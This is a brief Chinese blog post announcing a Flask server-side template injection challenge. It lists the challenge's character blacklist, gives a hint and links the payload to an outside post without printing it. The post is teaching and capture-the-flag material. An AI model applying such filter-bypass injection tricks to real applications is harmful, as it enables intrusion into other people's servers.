flask ssti小trick

Posted by 1nhann on 2021-05-23
Page views

菜鸡找了个有关ssti 的trick,出了道题放 github 上。。。

easy_ssti

  • blacklist=[“request” , “%” , “.“, “join” , “\d”]

hint: how to get a string?

payload: https://twitter.com/1nhann/status/1418191781603205129